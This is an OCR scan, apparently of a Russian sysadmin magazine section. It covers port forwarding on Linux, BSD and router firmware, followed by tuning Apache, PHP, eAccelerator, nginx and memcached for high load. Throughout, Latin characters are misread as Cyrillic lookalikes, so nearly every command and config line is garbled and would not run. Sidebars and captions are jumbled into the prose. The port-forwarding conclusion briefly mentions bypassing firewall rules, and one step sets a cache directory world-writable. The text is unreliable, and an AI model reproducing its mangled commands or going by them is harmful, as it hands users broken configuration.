Это действительно простой путь, который. . . не сработает для большинс- 
тва российских провайдеров, предоставляющих как доступ к локальной 
сети (прямой), так и доступ к сети интернет (через ѴРЫ/РРТР) . Дело в 
том, что добавленное таким образом правило будет применено к внеш- 
нему физическому интерфейсу, тогда как интерфейс рррО, используе- 
мый для выхода в интернет через ѴРП/РРТР, останется не при делах. 

Для решения проблемы можно воспользоваться прямым вмешательс- 
твом в недра ПП-ѴѴп:. Открываем вкладку «Тех. обслуживание», далее — 
«Команды» и набираем стандартные правила іргаЫез: 

ір1:аЫез -Р пар -А РКЕКОІІТІЫС -р Рср -і рррО \ 

--(ірогР 80 -3 ВЫАТ --Ро 192.168.0.100:80 

Нажимаем «Сохр. брандмауэр» и перезагружаемся. Ненамного труднее 
выполнить эту операцию с помощью веб-интерфейса прошивокХ-ѴѴгі:, 
представляющих собой, по сути, более юзабельный вариант ОрепѴѴгі;. 
Жмем на «ЫеЦл^огк», затем «Рігеѵѵаіі», выбираем в меню «Ыеѵѵ Киіе» пункт 
«Рогѵѵагсі» и нажимаем «Асій». Записываем в поле «Рогѵѵагсі То» ІР-адрес 
внутреннего сервера, в поле «Рогг» помещаем номер пробрасываемого 
порта. В выпадающем меню выбираем пункт «Ргоіосоі» и нажимаем 
«Асій», в появившемся меню выбираем протокол: ТСР или ППР. Если порт. 



открытый на шлюзе, должен отличаться от порта внутреннего сервера, 
выбираем в выпадающем меню пункт «Пезйпайоп Рогиз», получаем одно- 
именное поле и вводим в него номер порта. Нажимаем кнопку «5аѵе». 
Того же эффекта можно достичь, отредактировав конфигурационный 
файл /еіс/сопіі^/іігеѵѵаіі следующим образом: 

1ог\ліаг(і:рго1:о='(:ср сірогР = 80 : 192 . 168 . 0 . 100 : 80 

ДРУГИЕ ПОДХОДЫ 

Для осуществления проброса порта совсем необязательно использовать 
брандмауэры или системные демоны, как, например, этого требуют 
старые версии РгееВЗВ. Существует несколько других способов сделать 
это с помощью специализированного софта или стандартных инстру- 
ментов ОС (кто знает, возможно, ты используешь Міпіх в качестве ОС 
для шлюза :)) . Один из таких инструментов — 55Н. Далеко не каждый 
системный администратор в курсе, что проброс порта является стан- 
дартной функцией этой программы. Возьмем, к примеру, следующую 
ситуацию. В локальной сети, закрытой от внешней сети ЫАТ’ом, есть 
сервер, к которому тебе необходимо иметь доступ. Ситуация усугуб- 
ляется тем, что ты не имеешь привилегий для настройки файервола на 
машине-шлюзе. Зато у тебя есть доступ к 55Н-серверу, работающему 
на этом шлюзе. Как это может помочь? На самом деле очень сильно. Ты 
просто выполняешь следующую команду на удаленной машине (зегѵег- 
ір — адрес внутреннего сервера, ^аіеѵѵау-ір — адрес шлюза) : 

$ ЗЗІ1 -Ь 8080 : <зегѵег-ір> : 80 изег@<да0еѵ7ау-ір> 

И вуаля, порт 8080 локальной машины становится портом 80 внутрен- 
него сервера локалки. Теперь достаточно набрать в веб-браузере адрес 
1осаШо5і::8080, и ты попадешь туда, куда надо. Твой 55Н-клиент создаст 
туннель с 55Н-сервером шлюза, все передаваемые в рамках которого 
данные будут направлены на порт 80 внутреннего сервера. 

Более радикальный способ — установка софта, специально созданного 
для осуществления проброса портов. Одна из таких программ носит 
имя гіпеиі и представляет собой высокопроизводительный сервер, 
позволяющий пробрасывать любое количество соединений. Он есть 
в пакетах для популярных Ріпих-дистрибутивов и портах В5Э-систем. 
После его установки достаточно отредактировать файл /еіс/гіпеиі.сопі 
(/изг/ІосаІ/еіс/гіпеиі.сопО, поместив туда строки следующего вида: 

1.2. 3.4 80 192.168.0.100 80 
И (пере) запустить сервер командой: 

$ зисіо /еОс/іпИ: . сі/гіпеОсі гезОагО 

вЦЬипШили: 
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5ѴМ/АСК 



Іп^'о Сгарііе Зіаіие Юд - Бузіет МеИѵ/огк ѴРМ - кодои^ 

Ѵ\/АМ-Ы^М VV^РI“^АN ѴЬйіМ ѴѴігеІе55 Асіѵэпсесі Ѵ^ігек^5 Ріге'л'^ІІ ОНСР 0п5т^5Я Но5^5 ЫРпР ^о$ ^^м-|^N$ Шоі Тцеакг 



РігеѵѵаІІ Соп^ідигаЫоп 



РігеѵѵаІІ Ріиіев 



Ма<:сРі 

Ргоііосо!: 1;ср 
Оезіііпаіііоп РогЬз: 443 



Тагдеі: Рог! 

192.168.1.12 22 



Цр ЕсІіІ: 
Роѵуп Реіеііе 



NеѵѵКиIе: [Ропѵагсі_^>^ 



Проброс портов вХ-ѴѴг( 



# /изг/1оса1/е1іс/гс . (і/гіпе1:сі з1:аг1: 

во РгееВЗВ. Также во РгееВЗВ придется активировать запуск гіпеисі при 
старте: 

# есііо "гіпе1:сі_епаЫе="УЕЗ" " » /еЕс/гс . соп:Е 

После этого весь трафик, пришедший на порт 80 машины 1.2. 3.4, будет 
автоматически перенаправлен на тот же порт машины с ІР-адресом 
192.168.0.100. 

Один из излюбленных способов проброса портов среди ПЫІХ-адми- 
нистраторов заключается в использовании утилиты зоскеі; совместно с 
сетевым супер-сервером іпеиб. Как и все гениальное, идея в этом случае 
проста, а реализация очевидна. Открываем файл /еі:с/іпеі:сі.соп1 (даже 



иВР-туннель между 
двумяТІАТ 

Утилита руѵпаі: ( зату.рі /руѵпаі: /^ позволяет любому 

количеству клиентов, находящихся за одним NАТ-сервером, 
соединяться с сервером, который стоит за другим NАТ, при- 
чем никакой проброски портов на серверах не потребуется. 
Клиент может подключаться через такой сервер к любым ре- 
сурсам, либо только к тем, что ограничены сервером руѵнаі:. 



Вот так можно обеспечить клиентскому хосту 192.168.0.2 
получение Ні§ЫВ на любом еОонкеу-сервере: 

#ѵі /еІс/рксопТ 

гсіг разз оп $ех1:_і1 іпеЕ ргоЕо Еср :Егот апу \ 

Ео апу РОГЕ 4661 -> 192.168.0.2 
гсіг разз оп $ехР_і1 іпеО ргоОо Оср Ігот апу \ 

Оо апу рогР 4662 -> 192.168.0.2 
гсіг разз оп $ех1:_і1 іпеО ргоОо исір Ігот апу \ 

Оо апу рогО 4665 -> 192.168.0.2 
гсіг разз оп $ех1:_і1 іпеО ргоОо исір Ігот апу \ 

Оо апу роП: 4672 -> 192.168.0.2 




Проброс портов в ѴѴіпсІоѵѵз 2003 Зегѵег 

если В твоей системе используется более новый хіпеі:сі, ты все равно 
можешь использовать этот файл) и добавляем в него строку следующе- 
го вида: 

порті зОгеат Рср поѵ^аіі: гооО /изг/ІосаІ/Ып/зоскеО 
зоскек 192.168.0.100 порт2 

Здесь порті — это прослушиваемый порт на машине-шлюзе, а порт2 — 
порт назначения на внутренней машине 192.168.0.100. При этом оба 
они должны быть заданы в форме имени службы (ѵуѵуѵу, Іф и т.д.), если 
же таковой не имеется (ты выбрал произвольный порт), то ее необходи- 
мо добавить в файл /епс/зегѵісез. 

Далее можно перезагрузить іпеі;сі командой «кіП -НПР» и наслаждаться 
результатом. Если же его нет, то смотрим в файл /еПс/ЬозИз.аПош. Доступ 
к службе должен быть открыт. 

ВЫВОДЫ 

Несмотря на выбранный для статьи пример с пробросом порта в ло- 
кальную сеть, у технологии ПЫАТ есть множество других применений, 
включая создание более удобного способа доступа к удаленной машине, 
обход правил брандмауэра или просто обман. В любом случае, проброс 
портов остается очень удобной и легкой в реализации и применении 
технологией, которая может оказаться полезной в любой момент. 
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5УМ/АСК 



І1 тгазупаск.ги 



Не спасовать ^ 
перед лавинои 

ПОДГОТАВЛИВАЕМ ВЕБ-СЕРВЕР К ВЫСОКИМ НАГРУЗКАМ 

Популярность веб-страницы - нетолько благо, но и дополнительная головная 
боль сисадмина. Возрастая, поток посетителей создает большую нагрузку на 
сервер, который со временем перестаетсправляться со своими обязаннос- 
тями. В этот момент встает вопрос о покупке железа, который, тем не менее, 
можно отложитьдо лучших времен. Из этой статьи ты узнаешь, какзаставить 
сервер выдерживать на грузки даже тогда, когда он отказывается это делать. 



Популярность веб-страницы — не только благо, но и дополнительная 
головная боль сисадмина. Возрастая, поток посетителей создает все 
большую нагрузку на сервер, который со временем просто перестает 
справляться со своими обязанностями. В этот момент встает вопрос о по- 
купке железа, который, тем не менее, можно отложить до лучших времен. 
Из этой статьи ты узнаешь, какзаставить сервер вьщерживать нагрузки 
даже тогда, когда он отказывается это делать. 

Допустим, ты имеешь в своем распоряжении веб-сервер, на котором 
крутится более-менее посещаемый динамический веб-сайт, созданный 
на базе одной из РНР'шных СМ5. В общем, самая типичная для современ- 
ного рунета ситуация. Сайт развивается, растет, посетителей становится 
все больше, и ты начинаешь замечать постепенно возрастающие задерж- 
ки в скорости отдачи контента. Простейшие замеры показывают, что 
сервер уже не справляется с возложенными на него задачами, и в голову 
начинают закрадываться порочные мысли о покупке железа (аренде бо- 
лее мощного виртуального сервера) . Но спешить не стоит, в большинстве 
случаев ситуацию легко обратить в свою пользу. 

Эта статья расскажет тебе о том, как оптимизировать сервер и клиент- 
скую часть веб-сайта под высокую нагрузку. В ходе обсуждения мы 
затронем следующие темы: 

• ОптимизацршАрасЬе; 

• Оптимизацрія РНР; 

• Установка еАссеІегаНог; 

• Установка Ы^іпх в качестве фронт-энда; 

• Установка МетсасЬеб; 

• Клиентская оптимизацрія. 

ОПТИМИЗАЦИЯ АРАСНЕ 

Корневой компонент большинства современных веб-сайтов — это, 
конечно же, АрасЬе. Он зарекомендовал себя как наиболее функциональ- 
ный, стабильный и удобный в использовании НТТР-сервер, который 
можно использовать как для обслуживания домашней веб-страницы, 
так и для высоконагруженных корпоративных интернет-проектов. Одна 
проблема: АрасЬе — очень тяжелое прріложение, жадное до ресурсов сер- 
вера. И это должно быть учтено при его настройке. Вот список рекомен- 
даций, которые лучше выполнять при подготовке НТТР-сервера к работе : 

• Львиная доля функционала АрасЬе вынесена в загружаемые модули, 
которые можно активировать или отключить путем редактирования 
конфигурационного файла (директива ЬоасіМосіиІе) . Хорошей практи- 
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КОЙ является тотальное отключение всех неиспользуемых модулей, что 
позволит повысить производительность сервера и сохранить оператив- 
ную память. 

• АрасЬе обрабатывает каждый новый запрос в собственном потоке 
исполнения и позволяет использовать разные подходы для выполнения 
этой операции. Если ты собирал Арас1іе2 из исходников, то мог заметить, 
что в опциях сборки присутствует возможность выбора так называемого 
МРМ. Это и есть модуль мульти-процессинга (МпШ-ргосеззіп^ тосіиіе), 
используемый для распараллелив анрія НТТР-сервера. Всего их сущест- 
вует три: 

1. ргеЛ)гк — классический МРМ, реализующий модель мульти-про- 
цессинга, используемую в АрасЬе 1.3. Каждый поток обрабатывается в 
отдельном процессе. Не самый производительный вариант, но наиболее 
стабильный. Используется по умолчанию. 

2. ѵѵогкег — МРМ, основанный на потоках. Сервер порождает несколько 
процессов, по несколько потоков в каждом. Один запрос — один поток. 
Производительнее ргеіогк, но менее стабилен. 

3. еѵепі: — событийный МРМ. Вместо потоков запросы обрабатываются, 
используя событийную модель, похожую на ту, что применяется в п^іпх. 
Наиболее производительный МРМ, но и наименее стабрільный (находит- 
ся в экспериментальной стадии разработки) . 

Многие дистрибутивы позволяют устанавливать разные варианты 
АрасЬе, различающиеся используемым МРМ, их легко можно найти в 
репозитории по запросу «арас1іе2-трт». 

• АрасЬе позволяет контролировать максимальное количество порож- 
даемых потоков с помощью опции МахСИепИз. Не стоит устанавливать 
ее значение слишком большим, иначе в определенный момент сервер 
исчерпает всю оперативную память, начнет свопить, и необслуженными 
останутся гораздо больше клиентов, чем было бы при задании жесткого 
ограничения. Оптимальным считается значение, равное количеству 
памяти, доступной АрасЬе, поделенное на максимальный размер порож- 
денного потока (проверяется с помощью рз ріли шр) . 

• Как и многие другие НТТР-серверы, АрасЬе позволяет контролировать 
длительность удержания соединений типа кеер-аііѵе, используемых 
для передачи нескольких запросов/ответов в рамках одного соедине- 
ния. Кеер-аііѵе позволяет экономить ресурсы сервера, не вынуждая его 
создавать отдельный поток на каждую картинку, С55 и прочие элементы 
страницы. Однако слишком долго такое соединение держать открытым 
не стоит, потому как на это тоже уходят ресурсы. Хорошим значением 
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опции КеерАІіѵеТітеоин будет 5-10 секунд, причем, если все зависимые 
компоненты страницы отдаются клиенту отдельными серверами, а теку- 
щий сервер используется только для отдачи НТМЬ/РНР, необходимость 
поддержки кеер-аііѵе отпадает вовсе, и значение опции КеерАІіѵе лучше 
установить в 011. 

• АрасЬе не любит сжатие . Если ты решил увеличить скорость отдачи стра- 
ниц с помощью сжатия, то имей в виду, что, скорее всего, оно создаст еще 
большую нагрузку на сервер. Если же сжатие действительно необходимо 
(например, для мобршьного портала, основной поток клиентов которого 
использует канал СРК5) , то устанавливай коэффициент сжатия минималь- 
ным, это приведет лишь кнезначительномуросту объема результирующих 
данных, зато позволит существенно сэкономить ресурсы сервера. 



поэтому мы применим инструмент под названием еАссеІегаШг, который 
скомпилирует исходные тексты РНР в двоичное представление, оптими- 
зирует их и будет бережно хранить в оперативной памяти для более быст- 
рого доступа. Благодаря только этому скорость обработки РНР-скриптов 
вырастет в десятки раз (подтверждено тестами) . 

Пакета еАссеІегаНог нет в репозиториях популярных дистрибутивов, 
поэтому его придется собрать самостоятельно. Сначала устанавливаем 
необходимые для сборки утилиты: 

$ зийо ар1:-де1: іпзРаІІ рйрБ-сіеѵ ЬиіІй-еззепРіаІ 

Далее получаем исходные тексты еАссеІеганог: 



ОПТИМИЗАЦИЯ РНР 

Зачастую наибольшая нагрузка создается вовсе не НТТР-сервером, а ин- 
терпретатором языка программирования, используемого для создания 
динамического содержимого веб-сайта. Сегодня наиболее популярным 
языком для серверного веб-скриптинга является РНР, поэтому именно 
ему мы уделим внимание в нашей статье. Открываем файл /еПс/рЬрЗ/ 
арасЬеЗ/рЬр.іпі (путь для ЦЬппш, в других дистрибутивах может быть 
иным) и редактируем следующие строки: 

• тетогу_1ітц — лимит на съедаемую при генерации веб-страницы 
память. Перед изменением этого параметра рекомендуется выполнить 
соответствующие замеры и основывать значение уже на их результатах. 

• сіІ5р1ау_еггог8 = 011, еггог_1о§ = /ѵаг/1о§/р1ір — перенаправлять сооб- 
щения об ошибках в 1о§-файл . Включай этот параметр тогда, когда все 
скрипты будут полностью отлажены. 

• ир1оасі_тах_1і1е5І2е и ро5і:_тах_5І2е — максимальный размер загружае- 
мых файлов и Р05Т-запросов. Опять же, значение должно быть выбрано 
исходя из потребностей твоего веб-приложения. 

Теперь можно закрыть файл и выполнить глубокую оптимизацию с помо- 
щью РНР-ускорителя. 

УСТАНОВКА ЕАССЕІЕЯАТОЯ 

РНР — язык интерпретируемый. Это значит, что каждый раз, когда 
происходит вызов скрипта на этом языке, запускается РНР-интерпре- 
татор, который проводит полный анализ исходного кода. Причем, если 
спустя секунду произойдет второй запуск того же скрипта, вся процедура 
будет повторена заново. Это нерациональное использование ресурсов. 



$ ссі /-Ьтр/ 

$ \л?деР йРРр: //ЬагР .еассеІегаРог .пеР/зоигсе/О . 9 . б . 1/ 
еассе1егаРог-0 . 9 . б . 1 . -Ьаг . Ьг2 
$ ^аг хѵз I еассе1егаРог-0 .9.6.1. -Ьаг . Ьг2 
$ ссі еассе1егаРог-0 .9.6.1 
$ рііріге 

$ ./сопіідиге --епаЫе-еассе1ега1:ог=з}іаге(і 
$ таке 

$ зисіо таке іпзРаІІ 

Создаем каталог для хранения кэша: 

$ зисіо тксііг -р /ѵаг/сас1іе/еассе1ега1:ог 
$ зисіо сктосі 0777 /ѵаг/саске/еассеІегаРог 

И, наконец, подключаем еАссеІегаШг к РНР (добавить в начало файла) : 

# ѵі /е(с/рИр5/арасЬе2/рЬр.іпі 

[РНР] 

; Подключаем расширение 
ехРепзіоп = "еассеІегаРог . зо" 
еассеІегаРог . епаЫе = "1" 

; Максимальный размер дискового кэша (Мб) 
еассеІегаРог . зЬт_зІ 2 е = "64" 

; Каталог для хранения кэша 

еассеІегаРог . сас1іе_біг = " /ѵаг/сасПе/еассеІегаРог " 
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] 1н@] Хп-с^«вк^ар:^$ ар'Ь-сасЬе кевгсН арасЬв2 | 9гер пряі 
арасЬа2-прлі-еѵарі; - АрасИа НПТР $агѵ«г - аѵепі: сігіѵап шосіаі 
арасЬе2-иіірлі'ргеІогк - АрасЬа НТТР 5егѵег * ггайігіопаі. поп-гЬгеасіееІ шосіеі 
арасИе2-тр)П'ѴогкЁГ - АрасИе НГГТР Бегѵаг ^ ЬідН араесі іНгеа^есІ йосіеі. 
арасИе2-ілрлі‘іІк - йи1.^іи5аг ИРМ 1^йг АрасНе 2.2 
] 1й@] 1й-{;^а5кІар:~$ | 

АрасИе С различными МРМ-модулями в ІІЬипІи 

І5ег іл^-сіа’^а; 
т гкег_р госеззез 1 ; 

еггог_Т.од /ѵаг/іод/пдіпх/еггог Л од; 
рісі /ѵаг/ гип/пдіпх. рісі; 

еѵеп’^5 { 

ыогкег_соппес^іоп5 1024; 

# ти11:і_ассер1: оп; 

} 

М:1:р { 

іпсіисіе /е1:с/пдіпх/тіте. Ііурез; 

ассезз_1од /ѵаг/іод/пдіпх/ассезз Л од; 

зепй^ііе оп; 

#1:ср_лори5И оп; 

#кеера1іѵе_’Ьітеоиѣ 0 ; 
кеера1іѵе_'Ьітеои^ 65; 

ѣср побеіау оп; 



/е^с/пдіпх/пдіпх ■ согтР [КО] 



Настраиваем Мдіпх 

; Включаем оптимизатор кода 
еассеІегаВог . орВітізег = "1" 

; Перекомпилировать модифицированные скрипты 
еассеІегаВог . с1іеск_тРіте = "1" 

; Отключаем режим отладки 
еассеІегаРог . (іеЬид = "О" 

; Кэшировать все файлы (пустой фильтр) 
еассеІегаРог . іЕіІРег = "" 

; Неограниченный размер кэша в памяти 
еассеІегаВог . з1іт_тах = "О" 

; В случае отсутствия места в кэше удалять объекты старше 
1 часа (3600 секунд) 
еассеІегаРог . з1іт_РРІ = "3600" 
еассеІегаРог . з1іт_ргипе_регіоб = "0" 

; Кэшировать данные и в памяти, и на диске 
еассеіегабог . з1іт_оп1у = "0" 

; Сжимать кэшированные данные с максимальным уровнем ком- 
прессии 

еассеІегаРог . сотргезз = "1" 
еассеІегаРог . сотргезз_1еѵе1 = "9" 

УСТАНОВКА М6ІМХ 

Будучи популярным, большой динамический веб-сайт может создать та- 
кую нагрузку на сервер, что АрасЬе начнет «захлебываться и плеваться». 



Балансировка 

Коипсі гоЬіп ^N$ — один из самых простых видов баланси- 
ровки нагрузки. Для ее реализации достаточно присвоить 
ІР-адреса двух или более серверов одному доменному имени. 
Однако, есть и существенный минус: если один из серверов 
выйдет из строя, часть клиентов все равно будут отправлены 
к нему. 



еАссеІегаТог 



еДссеІегяЁог «иррогі: 


епаЫеіІ 


ѴеГАІйп 


0.9.5.3 


СасЬЕпд ЕпаЫе<і 


ігие 


Ор 1 :ітІ 2 ег ЕлаЫе<1 


кгце 


Метйгу 


33,554, Э9Б ВуЕйБ 


мешогу АѵэІІаЫе 


33.549,752 ВуЬеэ 


Меіпогу ДІІосаСесІ 


4.644 


СасГіЁ<і 5сгір1:5^ 


1 


5сі1р*5 


0 


СасИесІ Кеу» 


0 







"'’ШШгШйе 


еассе Іе гасог. аІІ оіл» ей_а йті п ^рат ^1 


пок^аіУе 


поѵэіие 


еассе Іе га(ог. сасНе_сІіг 


Лігр/еассеіегаіог 


Лтр/еасс€ІеГа1:аг 


еассе Іе гаЕог. сЬе ск^ті Іте 


1 


1 


еассеіе гэЕог сотр ге55 


1 


1 


еассе Іе гаЕог. соіпр ге55_І еѵеі 


9 


9 


еассе Іе гасог. сІеЬид 


1 


1 


еассеіе гаСог. еп аЫе 


1 


1 


еассе Іе гаСог. НІСег 


по ѵаіие 


ло ѵаЬе 


еассе Іе гаСог. [оддП Іе 


поѵзіие 


поѵак№ 


еассеіе гаСог. па те_5ра се 


поѵаіие 


поѵаЬе 



рИріп^оО для еАссеІегаІог 



и дело тут даже не в том, что железо не позволяет, а в тяжеловесности са- 
мого НТТР-сервера. АрасЬе отлично подходит для отдачи динамического 
контента, однако большая часть современных веб-страниц так или иначе 
состоит из статики, и использовать для их отдачи мош;ный, сложный и 
очень тяжелый НТТР-сервер было бы так же глупо, как ездить на вездехо- 
де по дорогам Швейцарии. Мы воспользуемся легковесным НТТР-серве- 
ром Ы^іпх для разгрузки АрасЬе и его освобожденрія от неблагодарного 
занятрія отдачей статического контента. В отличие от АрасЬе, Ы^іпх 
использует событийную модель обработки запросов, благодаря чему на 
любое количество клиентов требуется всего один процесс НТТР-сервера. 
Это сурцественно снижает нагрузку на железо, но создает определенные 
проблемы при обработке динамического контента (именно поэтому его 
не используют в качестве основного НТТР-сервера) . Обычно Ы^іпх уста- 
навливают на выделенную машину, которая смотрит во внешнюю сеть 
и выступает в качестве первого чекпоинта на пути следованрія запросов, 
однако допустим и вариант с одним физическим сервером, когда АрасЬе 
и Ы^іпх крутятся на одной машине. Остановимся на нем. Открываем 
файл /еі:с/арас]іе2/рогі;8.соп^ и изменяем две опции: 

ЫатеѴігбиаІНозб *:81 
Ьізбеп 81 

Далее устанавливаем Н^іпх: 

$ зибо арб-деб іпзбаіі пдіпх 

Открываем конфигурационный файл и пишем в него следуюш;ее: 

#ѵі /е(с/пдіпх/пдіпх.соп{ 

# Ыдіпх-пользователь 
изег ѵллпл?-баба; 

# Количество Ыдіпх-процессов ставим равным количеству 
процессорных ядер 

ѵ\?огкег_ргосеззез 1; 

еггог_1од /ѵаг/іод/пдіпх/еггог. Іод; 
ріб /ѵаг/гип/пдіпх.ріб; 

еѵепбз { 

ѵ70гкег_соппесбіопз 1024; 

} 

кббр { 
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5ѴМ/АСК 



81аЬ #1 
ЗІаЬ Сіааз 
8ГаЬ аазз #2 
51 ^ ааз& #1 

МетсасИесІ использует модуль зІаЬ-алло- 
кации памяти 



Раде 


СГіипк 


СГіупк 


Скупк 


СГшлк 


СИ у лк 


Раде 


СГшпк 


СІіупк 


СІіупк 


СГшпк 


СИупк 


Раде 


С^ипк, ( 


С^Ниек СИипк Ошпк СІіепЕ 


< СИилк 


Раде 


СПипк 


СИупк 


С^н^пк 


СИипк 


СИ у лк 




Совместная работа Ыдіпх и АрасИе 




> іп^о 

Сжатие методами 
02Ір и □еі'іаіе разли- 
чается только тем, что 
Огір-упаковщик до- 
бавляет к результату 
небольшой заголовок 
и контрольную сумму. 



# Стандартные настройки 
іпсіисіе /еРс/пдіпх/тіте.Рурез; 
сіе:ЕаиІС_Руре аррІісаРіоп/осСеР-зРгеат; 
зегѵег_патез_]таз]т_ЬискеС_зІ 2 е 64 ; 
ассезз_1од /ѵаг/іод/пдіпх/ассезз . Іод; 
зепсііЕіІе он; 

#Рср_пориз1і он; 

#кеера1 і ѵе_Р ітеоиС О ; 
кеера1іѵе_РітеоиС 65; 

Рср_посіе1ау он; 

# Включаем сжатие 
дгір он; 

д 2 Ір_ргохіесі апу; 
д 2 Ір_тіп_ 1 епд 1 :]т 1100; 
д 2 Ір_ііСРр_ѵегзіоп 1.0; 
д2Ір_Ьи11егз 4 8к; 
д 2 і р_с отр_1 е ѵе 1 9 ; 

д 2 Ір_Сурез СехС/рІаіп РехР/сзз аррІісаРіоп/ 
х-заѵазсгірр РехР/хтІ арр1ісаРіоп/хт1 
арріісаріоп/хті+гзз РехР/ з аѵазсгірр ; 

іпсіисіе /еРс/пдіпх/сопі . сі/* . сопі ; 
іпсіисіе /еРс/пдіпх/зікез-епаЫесі/* ; 

} 

Создаем конфиг нашего хоста: 

# ѵі /е(с/пдіпх/5І(е5-епаЫес1/Ио5(.сот 

зегѵег { 

ІізСеп 80; 

зегѵег_пате іюзР . сот; 

ассезз_1од /ѵаг/іод/пдіпх . ассезз_1од; 

# Всю статику Ыдіпх отдает самостоятельно 

ІосаРіоп \ . ( ^рд I з'ред I діі I рпд | сзз I з' з I 2 Ір | 

Рд 2 I д 2 I гаг | Ът.2 \ сіос I хіз I ехе I рсіі I ррС I Саг | ѵ^аѵ I Ьт 
р I гРі I зѵ^і I ісо I ІІѴ I РхР I хті | сіосх | хізх) $ { 
гооР /ѵаг/ѵл^/іюзР . сот/ ; 
іпсіех іпсіех.крті іпсіех.ркр; 
ассезз_1од оіі; 
ехрігез ЗОсі; 

} 

# Доступ к файлам типа .кРассезз запрещен 
ІосаРіоп ~ /Х.кР { 

(іепу а11; 

} 

# Все запросы ко всему остальному контенту 
передаем Араске 

ІосаРіоп / { 

ргоху_разз кРРр : //127 . о . о . 1 : 81/ ; 
ргоху_зеР_]теасіег Х-Кеа1-ІР $гетоРе_асісіг ; 
ргоху_зеР_]теасіег Х-Рогѵ/агсіесі-іог $гетоРе_ 



асісіг ; 

ргоху_зеР_]теасіег НозР $іюзР; 
ргоху_соппесР_РітеоиР 60; 
ргоху_зепсі_РітеоиР 90; 
ргоху_геасі_РітеоиР 90; 
ргоху_гесіігесР оіі; 
ргоху_зеР_]теасіег СоппесРіоп сіозе; 
ргоху_разз_]теасіег СопРепР-Туре; 
ргоху_разз_кеасіег СопРепР-ВізрозіРіоп; 
ргоху_разз_кеасіег СопРепР-ВепдРк; 

} 

} 

Все, перезапускаем АрасЬе и М^іпх: 

$ зисіо зегѵісе араске2 гезРагР 
$ зисіо зегѵісе пдіпх гезРагР 

УСТАНОВКА МЕМСАСНЕО 

МетсасЬесі — система юширования данных в оперативной 
памяти, которая может быть использована для распределен- 
ного хранения и ускорения доступа кданным любого типа. 
Это одно из самых популярных решений в области тотальной 
оптимизации веб-сайта для высоких нагрузок, не требую- 
ш;ее настройки и долгого изучения АРІ. Обычно тетсасЬеб 
используется, так сказать, двумя сторонами, одна из которых 
помещает данные в кэш, а другая — извлекает. В веб-среде 
роль первой стороны обычно играет небольшой РНР-скрипт, 
который записывает важные (с точки зрения скорости отда- 
чи) данные в тетсасЬеб, в то время как вторая сторона — это 
обычно легковесный фронт-энд сервер (как правило, п^іпх), 
использующий специальный модуль для чтения и отдачи 
данных из тетсасЬеб. Часто тетсасЬеб используется для 
кэшированрія всех страниц веб-сайта целиком, благодаря 
чему скорость доступа к этим страницам возрастает на не- 
сколько порядков. В простейшем случае такая конфигурация 
выглядит следующим образом: 

1. Устанавливается тетсасЬеб: 

$ зисіо арк-дек іпзкаіі тетсаскесі 

2. В секцию зегѵег конфигурационного файла п^іпх 
добавляется примерно следующее: 

# ѵі /е(с/пдіпх/пдіпх.соп{ 

Іосакіоп / { 

# Устанавливаем ключ тетсаскесі, равный за- 
прашиваемому икі 

зек $тетсаске(і_кеу $игі; 

# Адрес и порт демона тетсаскесі 
тетсаске(і_разз 127.0.0.1:11211; 
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Ыдіпх — гордость отечества :) 



# Заголовок по умолчанию 
(іе^аи11і_1:уре ^ех1:/}і1:т1 ; 

# Если данные в кэше не найдены — запрашиваем их у бэк- 
энда 

еггог_раде 404 = /баІІЬаск; 

} 

ІосаРіоп /баІІЬаск { 
ргоху_разз Ьаскепб; 

} 

3. Для РНР устанавливается расширение тетсасЬе (клиент к 
тетсасЬесі) : 

$ зибо ресі іпзкаіі тетсаске 

4. В страницы встраивается примерно такой код: 

$ѵІ5тарІе.рИр 

# Инициализация тетсаскеб опуіцена 
оЬ_зкагб ( ) ; 

$ккт1 = оЬ_дек_с1еап ( ) ; 

$тетсаске->зек ($_ЗЕЕѴЕК[ 'ЕЕ0иЕЗТ_ЕЕІ ' ] , $кРт1) ; 
еско $кРт1 ; 

Все это отлично работает, но только в отношении очень простых, почти 
статических веб-сайтов. Дело в том, что страница не всегда должна быть 
одинаковой для всех посетителей. Что если главная страница будет заю- 
ширована при входе на сайт гостя, а после него на сайт првдет зарегист- 
рированный участник, которому вновь предложат зарегистрироваться. 
Непорядок. Однако есть достаточно простой выход из этой ситуации. 
Проблему может решить покрытая мхом и паутиной технология под 
названием 551 (5егѵег 5ібе Іпсіпбез) . 551 позволяет разбить веб-страницу 
на несколько блоков, которые будут собраны фронт-эндом воедино в 
момент обработки запроса клиента. Например, используя 551, ты делишь 
главную страницу веб-сайта на две части: 

# ѵі /ѵаг/ѵѵѵѵѵѵ/іпсіех.рИр 

<ккт1> 

<Ьобу> 



тетсасЬесі 

При наличии достаточно больших объемов памяти хорошей 
практикой будет запуск демона тетсасЬей с флагом ' -Ь ' . 

В результате демон заранее подготовит к использованию 
всю выделенную ему память. Это немного поднимет общую 
производительность работы тетсасЬесі за счет исключения 
необходимости производить постоянные выделения памяти 
во время работы. 




Слоеный пирогтипичного веб-сайта 

<!--# іпсіибе ѵігкиа1=" /аикк.ркр" --> 

<!--# іпсіибе ѵігкиа1=" /Ьобу .ркр" --> 

</Ьобу> 

</ккт1> 

Это ровно та же страница, код аутентификации которой вынесен в файл 
аиЛ.рЬр, а вся остальная часть — в Ьобу.рЬр. Изюминка же заключается 
в том, что приведенный выше в четвертом шаге код кэширования ты 
помещаешь только во второй из этих файлов. Как результат вырисовы- 
вается следующая картина: 

1 . Человек приходит на сайт в первый раз. Происходит запрос главной 
страницы веб-сайта к п^іпх. 

2. Сервер п^іпх запрашивает файл іпбех.ріір у бэк-энда (АрасЬе), встре- 
чает внутри него 551-директивы и делает еще ''2* запроса к бэк-энду 
(аинЬ.рЬр и Ьобу.рЬр) . 

3. Получив запросы, АрасЬе запускает РНР-интерпретатор для обработки 
запрашиваемых файлов, в результате чего (кроме всего прочего) содер- 
жимое тяжелого файла Ьобу.рЬр попадает в юш тетсасЬесі. 

4. Ответ возвращается п^іпх, который объединяет файлы в один іпсіех. 
рЬр и отдает их клиенту. 

5. После этого на сайт приходит зарегистрированный участник, происхо- 
дит запрос іпсіех.рЬр у бэк-энда (хотя, скорее всего, он будет взят из кэша 
самого п^іпх) , однако к АрасЬе уйдет только запрос простого и легкого 
аШ:Ь.рЬр, тогда какЬосіу.рЬр будет взят из кэша тетсасЬесі. 

Само собой разумеется, 551 необходимо активировать в конфигураци- 
онном файле п^іпх с помощью опции «ззі оп», помещенной в секцию 
«іосаніоп />>. Стоит отметить, что блок аинЬ.рЬр также поддается кэширо- 
ванию, но для этого првдется присваивать всем зарегистрированным 
